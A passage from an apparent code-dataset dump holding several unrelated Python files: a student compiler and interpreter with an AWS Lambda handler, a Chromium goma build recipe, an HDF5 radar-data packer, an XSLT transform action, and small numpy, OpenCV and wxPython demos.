pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n if tipo_der == \"int\" and tipo_izq == \"int\":\n cuad = Quadruple(operator,operando_der,None ,operando_izq)\n #verifica que el tipo se tal (ESTE TIPO,-1)\n #verifica que sea del tipo igual a\n pila_operandos.append(operando_izq)\n pila_tipos.append('int')\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Los dos operandos deben ser enteros\")\n\ndef p_r_for_paso_1(p):\n 'r_for_paso_1 : '\n global temporal_bool\n valor_limite = pila_operandos.pop()\n valor_de_comp = pila_operandos.pop()\n #verificar que valor limite sea int\n pila_saltos.append(len(cuadruplos))\n cuad = Quadruple('<',valor_de_comp,valor_limite,temporal_bool)\n pila_operandos.append(valor_de_comp)\n pila_tipos.append('int') \n #pila_operandos.append((0,len(tabla_temporales)))\n #tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n #guardar salto del gotof\n pila_saltos.append(len(cuadruplos))\n #resultado_gotof = pila_operandos.pop()\n cuad2 = Quadruple('gotof',temporal_bool,None,None)\n temporal_bool += 1\n cuadruplos.append(cuad2)\n\ndef p_r_for_paso_2(p):\n 'r_for_paso_2 : '\n resultado = pila_operandos.pop()\n #guardar constante 1\n global 
constant_int\n global temporal_int\n insertion = const_table.insert_constant(1, 'int', constant_int)\n if insertion != constant_int:\n cuad = Quadruple('+',insertion,resultado,temporal_int)\n\n else:\n cuad = Quadruple('+',constant_int,resultado,temporal_int)\n constant_int += 1\n\n cuadruplos.append(cuad)\n cuadasignacion = Quadruple('=',temporal_int,None,resultado)\n temporal_int += 1\n cuadruplos.append(cuadasignacion)\n gotof = pila_saltos.pop()\n retorno = pila_saltos.pop()\n cuadgoto = Quadruple('goto',None,None,retorno)\n cuadruplos.append(cuadgoto)\n cuadruplos[gotof].modificar_resultado(len(cuadruplos))\n\ndef p_r_guardar_variable(p):\n 'r_guardar_variable : '\n pila_guardar_variable.append(p[-2])\n\ndef p_r_pila_operandos_push(p):\n 'r_pila_operandos_push : '\n global temporal_float\n global temporal_int\n\n oper = pila_guardar_variable.pop()\n if oper != \"tipo matriz\":\n if oper != \"tipo arreglo\":\n var = fun_dict.get_variable(oper)\n if var:\n if (\"dim_uno\" in var and var[\"dim_uno\"] == None) and (\"dim_dos\" in var and var[\"dim_dos\"] == None):\n pila_operandos.append(var['virtual_address'])\n pila_tipos.append(var[\"type\"])\n else:\n raise Exception(\"La variable tiene dimensiones\")\n else:\n funcion = fun_dict.search_function(oper)\n if not funcion:\n raise Exception(\"El identificador \" + oper + \" no existe\")\n\n else:\n return_type = funcion.type\n if return_type == \"float\":\n new_quad = Quadruple('=', oper, None, temporal_float)\n pila_operandos.append(temporal_float)\n pila_tipos.append(\"float\")\n temporal_float += 1\n\n else:\n func = fun_dict.search_global(oper + \"_func\")\n new_quad = Quadruple('=', func[\"virtual_address\"], None, temporal_int)\n pila_operandos.append(temporal_int)\n pila_tipos.append(\"int\")\n temporal_int += 1\n\n cuadruplos.append(new_quad)\n \n else:\n raise Exception(\"Error, la variable debe ser matriz\")\n \n\ndef p_r_pila_operandos_push_id(p):\n 'r_pila_operandos_push_id : '\n oper = pila_guardar_variable.pop()\n if oper != \"tipo matriz\":\n if oper != \"tipo arreglo\":\n var = fun_dict.get_variable(oper)\n if var:\n pila_operandos.append(var['virtual_address'])\n pila_tipos.append(var[\"type\"])\n else:\n raise Exception(\"Error, la variable \" + p[-2] + \" no existe\")\n else:\n raise Exception(\"Error, La variable debe ser matriz\")\n\ndef p_r_pila_operandos_push_cte_int(p):\n 'r_pila_operandos_push_cte_int : '\n # guardar la constant en la direccion de memoria - Tener en que direcion de memoria la gua\n global constant_int\n insertion = const_table.insert_constant(p[-1], 'int', constant_int)\n if insertion != constant_int:\n pila_operandos.append(insertion)\n\n else:\n pila_operandos.append(constant_int)\n constant_int += 1\n\n pila_tipos.append('int')\n tabla_temporales.append(('int', p[-1]))\n\ndef p_r_pila_operandos_push_cte_flt(p):\n 'r_pila_operandos_push_cte_flt : '\n global constant_float\n pila_operandos.append(constant_float)\n insertion = const_table.insert_constant(p[-1], 'float', constant_float)\n if insertion != constant_float:\n pila_operandos.append(insertion)\n\n else:\n pila_operandos.append(constant_float)\n constant_float += 1\n\n pila_tipos.append('float')\n tabla_temporales.append(('float', p[-1]))\n\ndef p_r_pop_mult(p):\n 'r_pop_mult : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] == '*' or pila_operadores[len(pila_operadores) - 1] == '/'):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = 
pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n\n if res_type != \"Error\":\n global temporal_float\n global temporal_int\n global temporal_bool\n \n #verifica que el tipo se tal (ESTE TIPO,-1)\n if res_type == 'float':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_float)\n pila_operandos.append(temporal_float)\n temporal_float += 1\n fun_dict.curr_function.temporal_float_spaces += 1\n\n elif res_type == 'int':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_int)\n pila_operandos.append(temporal_int)\n temporal_int += 1\n fun_dict.curr_function.temporal_int_spaces += 1\n\n elif res_type == 'bool':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_bool)\n pila_operandos.append(temporal_bool)\n temporal_bool += 1\n fun_dict.curr_function.temporal_bool_spaces += 1\n\n\n pila_tipos.append(res_type)\n tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\n\ndef p_r_pop_mas(p):\n 'r_pop_mas : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] == '+' or pila_operadores[len(pila_operadores) - 1] == '-'):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n\n if res_type != \"Error\":\n global temporal_float\n global temporal_int\n global temporal_bool\n \n #verifica que el tipo se tal (ESTE TIPO,-1)\n if res_type == 'float':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_float)\n pila_operandos.append(temporal_float)\n temporal_float += 1\n fun_dict.curr_function.temporal_float_spaces += 1\n\n\n elif res_type == 'int':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_int)\n pila_operandos.append(temporal_int)\n temporal_int += 1\n fun_dict.curr_function.temporal_int_spaces += 1\n\n elif res_type == 'bool':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_bool)\n pila_operandos.append(temporal_bool)\n temporal_bool += 1\n fun_dict.curr_function.temporal_bool_spaces += 1\n\n\n pila_tipos.append(res_type)\n tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\ndef get_type(tupla):\n # Temporal\n if tupla[0] == 0:\n return tabla_temporales[tupla[1]]\n\n else:\n return fun_dict.curr_function.vars[tupla[1]]\n\ndef p_r_push_arr(p):\n 'r_push_arr : '\n pila_operadores.append(\"arreglo\")\n\ndef p_r_genera_escribe(p):\n 'r_genera_escribe : '\n cuad = Quadruple(\"write\", None, None, pila_operandos.pop())\n pila_tipos.pop()\n cuadruplos.append(cuad)\n\ndef p_r_genera_lectura(p):\n 'r_genera_lectura : '\n cuad = Quadruple(\"read\", None, None, pila_operandos.pop())\n pila_tipos.pop()\n cuadruplos.append(cuad)\n\n\ndef p_r_genera_escribe_string(p):\n 'r_genera_escribe_string : '\n global constant_string\n\n insertion = const_table.insert_constant(p[-1], 'string',constant_string)\n \n if insertion != constant_string:\n cuad = Quadruple(\"write\", None, None, insertion)\n\n else:\n cuad = Quadruple(\"write\", None, None, constant_string)\n constant_string += 1\n\n cuadruplos.append(cuad)\n\ndef p_r_pop_comp(p):\n 'r_pop_comp : '\n if len(pila_operadores) > 0:\n 
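        # same pop-and-fold pattern as p_r_pop_mult / p_r_pop_mas above, but gated\n        # on the comparison-operator set so relational operators are only reduced\n        # at their own precedence level.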
if(pila_operadores[len(pila_operadores) - 1] in comp_set):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n if res_type != \"Error\":\n global temporal_float\n global temporal_int\n global temporal_bool\n \n #verifica que el tipo se tal (ESTE TIPO,-1)\n if res_type == 'float':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_float)\n pila_operandos.append(temporal_float)\n temporal_float += 1\n fun_dict.curr_function.temporal_float_spaces += 1\n\n elif res_type == 'int':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_int)\n pila_operandos.append(temporal_int)\n temporal_int += 1\n fun_dict.curr_function.temporal_int_spaces += 1\n\n elif res_type == 'bool':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_bool)\n pila_operandos.append(temporal_bool)\n temporal_bool += 1\n fun_dict.curr_function.temporal_bool_spaces += 1\n\n\n pila_tipos.append(res_type)\n tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\n\n\ndef p_r_pop_igu(p):\n 'r_pop_igu : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] == '='):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n\n if res_type != \"Error\":\n cuad = Quadruple(operator, operando_der, None, operando_izq)\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\n\ndef p_r_marcar_fondo_de_pila(p):\n 'r_marcar_fondo_de_pila : '\n pila_operadores.append(\"(\")\n\ndef p_r_desmarcar_fondo_de_pila(p):\n 'r_desmarcar_fondo_de_pila : '\n while pila_operadores[-1] != \"(\":\n if pila_operadores[-1] == \"*\" or pila_operadores[-1] == \"/\":\n p_r_pop_mult(-1)\n elif pila_operadores[-1] == \"+\" or pila_operadores[-1] == \"-\":\n p_r_pop_mas(-1)\n else:\n p_r_pop_comp(-1)\n pila_operadores.pop()\n\ndef p_r_pila_operadores_push_mult(p):\n 'r_pila_operadores_push_mult : '\n pila_operadores.append('*')\n\ndef p_r_pila_operadores_push_div(p):\n 'r_pila_operadores_push_div : '\n pila_operadores.append('/')\n\ndef p_r_pila_operadores_push_mas(p):\n 'r_pila_operadores_push_mas : '\n pila_operadores.append('+')\n\ndef p_r_pila_operadores_push_menos(p):\n 'r_pila_operadores_push_menos : '\n pila_operadores.append('-')\n\ndef p_r_pila_operadores_push_may(p):\n 'r_pila_operadores_push_may : '\n pila_operadores.append('>')\n\ndef p_r_pila_operadores_push_men(p):\n 'r_pila_operadores_push_men : '\n pila_operadores.append('<')\n\ndef p_r_pila_operadores_push_dif(p):\n 'r_pila_operadores_push_dif : '\n pila_operadores.append('!=')\n\ndef p_r_pila_operadores_push_iguigu(p):\n 'r_pila_operadores_push_iguigu : '\n pila_operadores.append(\"==\")\n\ndef p_r_pila_operadores_push_and(p):\n 'r_pila_operadores_push_and : '\n pila_operadores.append('&')\n\ndef p_r_pila_operadores_push_or(p):\n 'r_pila_operadores_push_or : '\n pila_operadores.append('|')\n\ndef p_r_pila_operadores_push_igu(p):\n 'r_pila_operadores_push_igu : '\n pila_operadores.append('=')\n\ndef p_r_pila_operadores_push_mayigu(p):\n 'r_pila_operadores_push_mayigu : 
'\n pila_operadores.append('>=')\n\ndef p_r_pila_operadores_push_menigu(p):\n 'r_pila_operadores_push_menigu : '\n pila_operadores.append('<=')\n\ndef p_r_push_fondo_falso(p):\n 'r_push_fondo_falso : '\n pila_operandos.append(\"(\")\n pila_tipos.append(\"(\")\n\ndef p_r_vaciar_fondo_falso(p):\n 'r_vaciar_fondo_falso : '\n pass\n\n# Arreglos\ndef p_r_register_dim(p):\n 'r_register_dim : '\n pass\n\n\n\ndef print_quads():\n for i,cuad in enumerate(cuadruplos):\n print(i, cuad.operador, cuad.operando_izq, cuad.operando_der, cuad.resultado)\n\ndef compile(program):\n global cuadruplos\n global const_table\n global fun_dict\n cuadruplos = []\n const_table = Constanttable()\n fun_dict = FunctionsDirectory()\n parser = yacc.yacc()\n parser.parse(program)\n print_quads()\n return cuadruplos, const_table\n\noperations = Operations()\n\n\nop_list = {\n \"goto\" : operations.goto,\n \"gotof\" : operations.goto_false,\n \"+\" : operations.plus_op,\n \"+_\" : operations.plus_op_esp,\n \"*_\": operations.mult_op_esp,\n \"-\" : operations.minus_op,\n \"*\" : operations.mult_op,\n \"/\" : operations.div_op,\n \"==\" : operations.eq_op,\n \"&\" : operations.and_op,\n \"|\" : operations.or_op,\n \"!=\" : operations.not_eq_op,\n \">=\" : operations.greater_eq_op,\n \"<=\" : operations.less_qp_op,\n \">\" : operations.greater_op,\n \"<\" : operations.less_op,\n \"=\" : operations.asignation,\n 'write': operations.write,\n 'era': operations.era,\n 'parameter': operations.param,\n 'gosub': operations.gosub,\n 'return': operations.return_val,\n 'read' : operations.read,\n 'endfunc' : operations.endfunc,\n 'ver': operations.ver\n}\n\ndef execute(quads, const_table):\n instruction_pointer = 0\n operations.load_constants(const_table)\n res = \"\"\n exceptions = {\"ver\", \"write\"}\n\n while instruction_pointer < len(quads):\n if quads[instruction_pointer].operador == \"gosub\":\n new_quad_number = op_list[quads[instruction_pointer].operador](quads[instruction_pointer], instruction_pointer)\n\n\n else:\n new_quad_number = op_list[quads[instruction_pointer].operador](quads[instruction_pointer])\n if quads[instruction_pointer].operador == \"write\":\n if new_quad_number:\n res += str(new_quad_number) + '\\n'\n\n else:\n raise Exception(\"Error, no puedes acceder a una variable/casilla a la que no has asignado valor\")\n\n elif quads[instruction_pointer].operador == \"ver\":\n if new_quad_number == False:\n raise Exception(\"Error, índice fuera de rango\") \n\n \n if new_quad_number and quads[instruction_pointer].operador not in exceptions:\n instruction_pointer = new_quad_number\n\n else:\n instruction_pointer += 1\n\n return res\n\n\ndef main(event, context):\n restart_variables()\n body = json.loads(event[\"body\"])\n programa = body[\"program\"]\n output = []\n\n try:\n quads, const_table = compile(programa)\n quads_list = []\n\n for quad in quads:\n quads_list.append([quad.operador, quad.operando_izq, quad.operando_der, quad.resultado])\n\n if not input_included:\n # go check if we will need an input at some point\n output, needs_input = execute(quads, const_table.table)\n if(needs_input):\n response = {\n \"statusCode\": 202,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n\n else:\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n\n else:\n output, needs_input = execute(quads, const_table.table, body[\"input\"])\n if(needs_input):\n response = {\n \"statusCode\": 202,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n\n else:\n response = {\n 
\"statusCode\": 200,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n \n \n except Exception as e:\n print(e)\n response = {\n \"statusCode\": 300,\n \"body\": str(e)\n }\n\n\n return response\n\n # Use this code if you don't use the http event with the LAMBDA-PROXY\n # integration\n \"\"\"\n return {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"event\": event\n }\n \"\"\"\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":47904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584069590","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport re\n\nDEPS = [\n 'goma',\n 'recipe_engine/platform',\n 'recipe_engine/properties',\n 'recipe_engine/step',\n]\n\ndef RunSteps(api):\n api.goma.ensure_goma()\n api.step('gn', ['gn', 'gen', 'out/Release',\n '--args=use_goma=true goma_dir=%s' % api.goma.goma_dir])\n\n command = list(api.properties.get('build_command'))\n env = {}\n allow_build_without_goma = api.properties.get(\n 'allow_build_without_goma', False)\n\n with api.goma.build_with_goma(\n ninja_log_outdir=api.properties.get('ninja_log_outdir'),\n ninja_log_compiler=api.properties.get('ninja_log_compiler'),\n ninja_log_command=command,\n allow_build_without_goma=allow_build_without_goma,\n env=env):\n if 'GOMA_DISABLED' in env:\n api.goma.remove_j_flag(command)\n api.step('ninja', command, env=env)\n else:\n # build something using goma.\n api.step('echo goma jobs',\n ['echo', str(api.goma.recommended_goma_jobs)])\n api.step('echo goma jobs second',\n ['echo', str(api.goma.recommended_goma_jobs)])\n api.step('ninja', command, env=env)\n\ndef GenTests(api):\n for platform in ('linux', 'win', 'mac'):\n properties = {\n 'buildername': 'test_builder',\n 'mastername': 'test_master',\n 'slavename': 'test_slave',\n 'clobber': '1',\n 'build_command': ['ninja', '-C', 'out/Release', '-j', '500'],\n 'ninja_log_outdir': 'out/Release',\n 'ninja_log_compiler': 'goma',\n 'build_data_dir': 'build_data_dir',\n }\n\n yield (api.test(platform) + api.platform.name(platform) +\n api.properties.generic(**properties))\n\n yield (api.test('%s_goma_disabled' % platform) +\n api.step_data('start_goma', retcode=1) +\n api.platform.name(platform) +\n api.properties(allow_build_without_goma=True) +\n api.properties.generic(**properties))\n","sub_path":"scripts/slave/recipe_modules/goma/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78865068","text":"#!/usr/bin/env python\n\n# The USRP process saves raw binary files. The process.py program\n# processes them and yields a numpy array file. 
This program takes \n# many numpy array files from a single day and packs them into a single\n# hdf5 file.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport glob\n\nflist = glob.glob(\"/home/alex/sounder/20131126/rx_*.npy\")\nflist = np.sort(flist)\nfilename = \"soundings_20131126.h5\"\noutfile = h5py.File(filename, 'w')\nfor f in flist:\n\tdata = np.load(f)\n\tdata = 10*np.log10(data[:,0])\n\ttemp = f.split('_')[1]\n\ttime = temp.split('.')[0]\n\tfreq = \"4495\"\n\trecordname = time + '_' + freq\n\toutfile[recordname] = data\n\trecord = outfile[recordname]\n\trecord.attrs['Units'] = 'dB'\n\trecord.attrs['Time'] = time\n\trecord.attrs['Frequency (kHz)'] = freq\n\trecord.attrs['P_Code'] = 'Barker_13'\n\trecord.attrs['N_Pulses'] = 8192\n\trecord.attrs['PRF (Hz)'] = 400\n\trecord.attrs['N_Ranges'] = np.size(data)\noutfile.close()\n","sub_path":"process/h5pack.py","file_name":"h5pack.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271520783","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/coils/logic/workflow/actions/xml/transform.py\n# Compiled at: 2012-10-12 07:02:39\nimport os, base64\nfrom lxml import etree\nfrom coils.core import *\nfrom coils.core.logic import ActionCommand\nfrom extentions import OIEXSLTExtensionPoints\nfrom coils.logic.workflow import XSLTDocument\n\nclass TransformAction(ActionCommand):\n __domain__ = 'action'\n __operation__ = 'transform'\n __aliases__ = ['transformAction']\n\n def __init__(self):\n ActionCommand.__init__(self)\n\n @property\n def result_mimetype(self):\n return self._output_mimetype\n\n def do_action(self):\n oie_extentions = OIEXSLTExtensionPoints(context=self._ctx, process=self.process, scope=self.scope_stack, ctxids=self._ctx_ids)\n extensions = etree.Extension(oie_extentions, ('sequencereset', 'sequencevalue',\n 'sequenceincrement', 'messagetext',\n 'searchforobjectid', 'tablelookup',\n 'reformatdate', 'datetimetodate',\n 'stringtodate', 'stringtodate',\n 'xattrvalue', 'countobjects',\n 'getpid', 'month', 'year',\n 'monthstart', 'monthend', 'today',\n 'yesterday', 'tomorrow', 'dateplusdays',\n 'days', 'weekdays', 'replace'), ns='http://www.opengroupware.us/oie')\n source = etree.parse(self.rfile)\n self.log.debug(('Template is {0}b').format(len(self._xslt)))\n xslt = etree.XSLT(etree.XML(self._xslt), extensions=extensions)\n self.wfile.write(unicode(xslt(source)))\n oie_extentions.shutdown()\n\n def parse_action_parameters(self):\n self._b64 = self.action_parameters.get('isBase64', 'NO').upper()\n xslt_string = self.action_parameters.get('xslt', None)\n xslt_name = self.action_parameters.get('template', None)\n if xslt_string:\n if self._b64 == 'YES':\n self.log_message('Base64 encoded inline template', category='debug')\n self._xslt = base64.decodestring(xslt_string.strip())\n else:\n self.log_message('Native inline template', category='debug')\n self._xslt = self.decode_text(xslt_string)\n elif xslt_name:\n self.log_message(('Loading XSLT template named \"{0}\"').format(xslt_name), category='debug')\n stylesheet = XSLTDocument(xslt_name)\n if stylesheet:\n handle = stylesheet.read_handle\n if handle:\n self._xslt = handle.read()\n BLOBManager.Close(handle)\n else:\n raise CoilsException(('Unable to open XSLT stylesheet \"{0}\" for reading').format(xslt_name))\n 
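                    # the BLOB handle was already drained into self._xslt and closed\n                    # above; the XSLTDocument wrapper itself is released next.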
stylesheet.close()\n            else:\n                raise CoilsException(('XSLT Stylesheet \"{0}\" not found.').format(xslt_name))\n        else:\n            raise CoilsException('No XSLT provided for transform')\n        self.log_message(('Template size is {0}b').format(len(self._xslt)), category='debug')\n        ctx_param = self.action_parameters.get('contextIds', None)\n        if ctx_param:\n            ctx_param = self.process_label_substitutions(ctx_param)\n            self._ctx_ids = [ int(x) for x in ctx_param.split(',') if x in self._ctx.context_ids ]\n        else:\n            self._ctx_ids = self._ctx.context_ids\n        self._output_mimetype = self.action_parameters.get('mimetype', 'application/xml')\n        return\n\n    def do_epilogue(self):\n        pass","sub_path":"pycfiles/OpenGroupware-0.1.48-py2.6/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271475305","text":"from __future__ import division, print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x,a,b):\n    return a*x**2+b*x**3\n\ndef create_noisy_y(f, x, args):\n    y = np.random.normal(f(x,*args), 0.1)\n    # print(y)\n    return y\n\ndef evaluate_L(y,f,x,args):\n    L = sum(abs(y-f(x,*args)))\n    return L\n\nx = np.array(range(1,11))\na = 1\nb = 4\nargs = [a,b]\n\nL = []\n\nfor i in range(1000):\n    y = create_noisy_y(f, x, args)\n    # plt.plot(x, f(x,*args), '.', label='true')\n    # plt.plot(x, y, '.', label='noisy')\n    # plt.semilogy()\n    # plt.legend()\n\n    L.append(evaluate_L(y,f,x,args))\n    # print(L)\n\nplt.hist(L)","sub_path":"ex-1-1.py","file_name":"ex-1-1.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441286487","text":"import cv2\nimport numpy as np\n\ndef creat_img():\n    img = np.ones([400,400,3],np.float32)\n    img[:, :, 0] = img[:, :, 0] * 0\n    img[:, :, 1] = img[:, :, 1] * 0\n    img[:, :, 2] = img[:, :, 2] * 1\n\n    cv2.imshow(\"creating\",img)\n\ncreat_img()\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"code/pycharm project/studying/图像识别/创建图片.py","file_name":"创建图片.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619291721","text":"import wxversion\n# wxversion.select(\"2.8\")\nimport wx\nimport wx.media\n\nimport itertools as IT\nimport os\n\nIMAGE_DIR = os.path.expanduser('H:\ieee//all_functions\linux server\python GUI\Grid_on_photo/images')\nSOUND_DIR = os.path.expanduser('H:\ieee//all_functions\linux server\python GUI\Grid_on_photo/sounds')\n\n\nclass MainWindow(wx.Frame):\n\n    title = \"Main Menu\"\n\n    def __init__(self, parent, id):\n        wx.Frame.__init__(self, parent, id, 'Window', size=(1000, 700))\n        panel = wx.Panel(self, -1)\n        self.SetBackgroundColour(wx.Colour(100, 100, 100))\n        self.Centre()\n        self.Show()\n\n        status = self.CreateStatusBar()\n\n        menubar = wx.MenuBar()\n        filemenu = wx.Menu()\n        exitmenu = filemenu.Append(wx.NewId(), \"Exit\", \"Exit Program\")\n\n        menubar.Append(filemenu, \"File\")\n        self.Bind(wx.EVT_MENU, self.onExit, exitmenu)\n        self.SetMenuBar(menubar)\n\n        font1 = wx.Font(\n            30, wx.MODERN, wx.NORMAL, wx.NORMAL, False, u'Consolas')\n\n        Text1 = wx.StaticText(panel, -1, \"Rhythm Trainer\", (10, 15))\n        Text1.SetFont(font1)\n        Text1.SetForegroundColour('white')\n\n        btn1 = wx.Button(panel, label='Basic', pos=(100, 200), size=(150, 50))\n        btn1.SetFont(\n            wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n        self.Bind(wx.EVT_BUTTON, self.newwindow, btn1)\n\n
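        # NOTE: only the 'Basic' button is bound to a handler; 'Advanced',\n        # 'Notations' and 'Settings' below are created but never wired up.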
btn2 = wx.Button(\n panel, label='Advanced', pos=(100, 270), size=(150, 50))\n btn2.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n btn3 = wx.Button(\n panel, label='Notations', pos=(100, 340), size=(150, 50))\n btn3.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n btn4 = wx.Button(\n panel, label='Settings', pos=(100, 410), size=(150, 50))\n btn4.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n btn5 = wx.Button(panel, label=\"Quit\", pos=(820, 550), size=(150, 50))\n btn5.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.OnClick, btn5)\n\n def OnClick(self, event):\n self.Close()\n\n def OnQuitButton(self, event):\n wx.Sleep(1)\n self.Destroy()\n\n def onExit(self, event):\n self.Destroy()\n\n def newwindow(self, event):\n secondWindow = Window2(parent=None, id=-1)\n secondWindow.Show()\n self.Close()\n\n\nclass Window2(wx.Frame):\n\n title = \"new Window\"\n\n def __init__(self, parent, id):\n wx.Frame.__init__(self, parent, id, 'Window2', size=(1000, 700))\n panel = wx.Panel(self, -1)\n\n self.SetBackgroundColour(wx.Colour(100, 100, 100))\n self.Centre()\n self.Show()\n\n status = self.CreateStatusBar()\n\n menubar = wx.MenuBar()\n filemenu = wx.Menu()\n exitmenu = filemenu.Append(wx.NewId(), \"Exit\", \"Exit Program\")\n\n menubar.Append(filemenu, \"File\")\n self.Bind(wx.EVT_MENU, self.onExit, exitmenu)\n self.SetMenuBar(menubar)\n\n font2 = wx.Font(\n 30, wx.MODERN, wx.NORMAL, wx.NORMAL, False, u'Consolas')\n\n Text2 = wx.StaticText(panel, -1, \"Rhythm Trainer\", (10, 15))\n Text2.SetFont(font2)\n Text2.SetForegroundColour('white')\n self.Show(True)\n\n btn1 = wx.Button(panel, label=\"Back\", pos=(820, 550), size=(150, 50))\n btn1.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.OnClick, btn1)\n\n btn2 = wx.Button(panel, label=\"Play\", pos=(820, 100), size=(150, 50))\n btn2.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.onPlaySound, btn2)\n\n btn3 = wx.Button(panel, label=\"Stop\", pos=(820, 150), size=(150, 50))\n btn3.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.onStopSound, btn3)\n\n btn4 = wx.Button(panel, label=\"Next\", pos=(820, 200), size=(150, 50))\n btn4.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.loadImage, btn4)\n self.panel = wx.Panel(self, -1, pos=(50, 50), size=(800, 200))\n\n self.images = IT.cycle(\n [filename for filename in os.listdir(IMAGE_DIR)\n if any(filename.lower().endswith(ext) \n for ext in ('.png', '.jpg', '.jpeg'))])\n self.image_file = next(self.images)\n\n img = wx.EmptyImage(240,240)\n self.imageCtrl = wx.StaticBitmap(self.panel, wx.ID_ANY, \n wx.BitmapFromImage(img), pos=(200, 50))\n\n def loadImage(self, event):\n self.image_file = next(self.images)\n print(self.image_file)\n image_file = os.path.join(IMAGE_DIR, self.image_file)\n img = wx.Image(image_file, wx.BITMAP_TYPE_ANY)\n img = img.Scale(240,240)\n # The idea of using imageCtrl.SetBitmap comes from\n # http://www.blog.pythonlibrary.org/2010/03/26/creating-a-simple-photo-viewer-with-wxpython/\n self.imageCtrl.SetBitmap(wx.BitmapFromImage(img))\n\n def onPlaySound(self, event):\n sound_file, ext = os.path.splitext(self.image_file)\n sound_file = os.path.join(SOUND_DIR, sound_file + '.mp3')\n print(sound_file)\n sound = 
